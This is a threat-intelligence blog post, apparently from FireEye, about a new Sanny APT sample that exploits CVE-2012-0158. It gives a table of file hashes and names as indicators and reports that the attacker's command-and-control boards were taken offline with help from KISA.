update.exe update.exe 725fc0d7a8e7b9e01a83111619744b6f 725fc0d7a8e7b9e01a83111619744b6f msdsp.dll msdsp.dll 654234576804d 654234576804d V0.9.6Y-SN1-<hostname>-<IP address> V0.9.6Y-SN1-<hostname>-<IP address> Aug 28th 2012 Aug 28th 2012
igfxtray.exe igfxtray.exe 681a014e9d221c1003c54a2a9a1d9df8 681a014e9d221c1003c54a2a9a1d9df8 winsups.dll winsups.dll mqe45tex13fw14op0 mqe45tex13fw14op0 V0.7-SN0-<hostname>-<IP address> V0.7-SN0-<hostname>h;-<IP address> Aug 28th 2012 Aug 28th 2012
NA NA 6aac76fc8309e29ea8a7afea48ae9b29 6aac76fc8309e29ea8a7afea48ae9b29 msdsp.dll msdsp.dll 654234576804d 654234576804d V0.9.6X-SN1-<hostname>-<IP address> V0.9.6X-SN1-<hostname>-<IP address> Aug 12th 2012 Aug 12th 2012
ctfmon.exe ctfmon.exe d5640ae049779bbb068eff08616adb95 d5640ae049779bbb068eff08616adb95 winsups.dll winsups.dll mqe45tex13fw14op0 mqe45tex13fw14op0 V0.7-SN0-<hostname>-<IP address> V0.7-SN0-<hostname>-<IP address> Aug 2nd 2010 Aug 2nd 2010
igfxtray.exe igfxtray.exe 681a014e9d221c1003c54a2a9a1d9df8 681a014e9d221c1003c54a2a9a1d9df8 winsups.dll winsups.dll mqe45tex13fw14op0 mqe45tex13fw14op0 V0.7-SN0-<hostname>-<IP address> V0.7-SN0-<hostname>-<IP address> Aug 2nd 2010 Aug 2nd 2010
igfxpers.exe igfxpers.exe 06d5dddd4c349f666d84a91d6edc4f8d 06d5dddd4c349f666d84a91d6edc4f8d msdsp.dll msdsp.dll NA NA NA NA NA NA    

Thanks to Darien Kindlund for his assistance in research.

Sanny CnC Backend Disabled

We recently encountered in the wild another sample related to the Sanny APT. For readers who are not familiar with the Sanny APT, please refer to our previous blog for the background. The sample was using the same lure text and CVE-2012-0158 vulnerability. However this time it was using a different board named "ecowas_1" as compared to "kbaksan_1" which was employed previously. The following are the CnC URLs to list stolen data entries extracted from the samples:

New    -->      hxxp://

Previous -->       hxxp://

Based on the time stamps and other indicators, we believe that both samples were created and deployed at the same time. The attacker probably used different boards/DBs to divide victims to make sure that if one goes down he/she still can keep getting the stolen data from the remaining ones.

We have been in touch with Korea Information Security Agency (KISA) regarding the Sanny APT and with their help the CnC boards ecowas_1 and kbaksan_1 are shut down (not serving any content). The following screenshot shows the response if you access the ecowas_1 board.

[caption id="attachment_1432" align="alignnone" width="522"]sanny_v2_sshot

The text in the figure 1 roughly translates to “Error: Blackout”

We want to thank KISA for collaborating with FireEye on this important case. Both FireEye and KISA are monitoring this threat and will let you know if there is any new update.